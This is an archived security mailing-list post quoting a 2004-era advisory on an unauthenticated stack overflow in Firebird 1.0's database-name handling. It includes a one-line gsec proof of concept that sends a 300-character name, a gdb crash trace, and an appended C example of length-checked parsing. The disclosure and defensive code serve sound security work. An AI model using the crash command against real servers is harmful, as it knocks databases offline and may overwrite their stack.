Message-ID: <3CF95025.7090202@secnetops.com>
From: kf_lists at secnetops.com (KF (lists))
Subject: Firebird Database Remote Database Name Overflow
So is this Firebird specific, or does it also impact Borland InterBase
users?
-KF
Aviram Jenik wrote:
> Firebird Database Remote Database Name Overflow
>------------------------------------------------------------------------
>
>Article reference:
>http://www.securiteam.com/unixfocus/5AP0P0UCUO.html
>
>
>SUMMARY
>
><http://firebird.sourceforge.net> Firebird is "a relational database offering
>many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix
>platforms. Firebird offers excellent concurrency, high performance, and
>powerful language support for stored procedures and triggers. It has been
>used in production systems, under a variety of names since 1981".
>
>A vulnerability in Firebird Database's way of handling database names allows
>an unauthenticated user to cause the server to crash and overwrite critical
>sections of the stack used by the database.
>
>DETAILS
>
>Vulnerable Systems:
>* Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable
>
>Immune Systems:
>* Firebird Database version 1.5.0 (others are presumed to be immune as well)
>
>
>By issuing:
>gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever
>-password whatever
>
>On a remote server, you can see that:
>gdb /usr/lib/firebird/bin/ibserver
>GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is
>free software, covered by the GNU General Public
>License, and you are welcome to change it and/or distribute copies of it
>under certain conditions.
>Type "show copying" to see the conditions.
>There is absolutely no warranty for GDB. Type "show warranty" for
>details.
>This GDB was configured as "i386-linux"...(no debugging symbols
>found)...Using host libthread_db library
>"/lib/tls/libthread_db.so.1".
>
>(gdb) r
>Starting program: /usr/lib/firebird/bin/ibserver
>(no debugging symbols found)...(no debugging symbols
>found)...(no debugging symbols found)...(no debugging
>symbols found)...(no debugging symbols found)...[Thread
>debugging using libthread_db enabled]
>[New Thread 1075462272 (LWP 31389)]
>(no debugging symbols found)...(no debugging symbols
>found)...(no debugging symbols found)...(no debugging
>symbols found)...(no debugging symbols found)...[New
>Thread 1092549552 (LWP 31392)]
>[New Thread 1100938160 (LWP 31393)]
>[Thread 1100938160 (LWP 31393) exited]
>[Thread 1092549552 (LWP 31392) exited]
>[New Thread 1092549552 (LWP 31396)]
>
>Program received signal SIGSEGV, Segmentation fault.
>[Switching to Thread 1092549552 (LWP 31396)]
>0x08132223 in ERR_post ()
>
>
>(gdb) bt
>#0 0x08132223 in ERR_post ()
>#1 0x080942ac in THD_wlck_unlock ()
>#2 0x41414141 in ?? ()
>#3 0x41414141 in ?? ()
>#4 0x41414141 in ?? ()
>#5 0x41414141 in ?? ()
>#6 0x41414141 in ?? ()
>#7 0x41414141 in ?? ()
>#8 0x00414141 in ?? ()
>#9 0x0000012c in ?? ()
>..
>
>Solution:
>Debian is currently not maintaining this version of the product, so it is
>recommended that you use a source code based installation.
>
>
>ADDITIONAL INFORMATION
>
>The information has been provided by <mailto:expert@...uriteam.com> Noam
>Rathaus.
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
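As an added example (not Firebird's code and not part of the advisory above), here is the defensive pattern the crash points at: a connect-string parser that checks the length of the "host:database" components against fixed-size stack buffers and rejects over-long input instead of copying it unchecked. The buffer sizes and the sample host 192.168.1.52 are assumptions for illustration.

```c
/* Added example, not Firebird's source. A backtrace whose saved frames are
 * all 0x41414141 (as in the quoted gdb session) is the signature of a
 * fixed-size stack buffer filled by an unchecked copy of attacker-length
 * data; the parser below refuses such input up front. */
#include <stdio.h>
#include <string.h>

#define HOST_MAX     64   /* assumed buffer sizes for illustration */
#define DBPATH_MAX   256

/* Split "host:path" (or just "path") into two caller-supplied buffers.
 * Returns 0 on success, -1 if either part would not fit with its NUL.
 * On failure both output buffers are left empty. */
int parse_db_name_safe(const char *in, char *host, size_t host_sz,
                       char *path, size_t path_sz)
{
    const char *colon = strchr(in, ':');
    const char *p = colon ? colon + 1 : in;
    size_t hlen = colon ? (size_t)(colon - in) : 0;
    size_t plen = strlen(p);

    host[0] = path[0] = '\0';
    /* Reject rather than truncate: silent truncation would make the
     * server open a different database than the client asked for. */
    if (hlen >= host_sz || plen >= path_sz)
        return -1;
    memcpy(host, in, hlen);
    host[hlen] = '\0';
    memcpy(path, p, plen);
    path[plen] = '\0';
    return 0;
}

/* Handler shaped like the vulnerable one: fixed stack buffers. With a
 * plain strcpy() into `path`, a 300-byte name would overrun the saved
 * registers and return address that the advisory's frames #2-#9 show. */
int accept_db_name(const char *in)
{
    char host[HOST_MAX];
    char path[DBPATH_MAX];
    return parse_db_name_safe(in, host, sizeof host, path, sizeof path);
}

/* Constructed input mirroring the advisory's gsec command:
 * "192.168.1.52:" followed by n bytes of 'A' (the report used n = 300). */
int demo_long_name(size_t n)
{
    static char buf[1024];
    const char *prefix = "192.168.1.52:";
    size_t pre = strlen(prefix);
    if (pre + n + 1 > sizeof buf) return -2;   /* test harness limit */
    memcpy(buf, prefix, pre);
    memset(buf + pre, 'A', n);
    buf[pre + n] = '\0';
    return accept_db_name(buf);
}
```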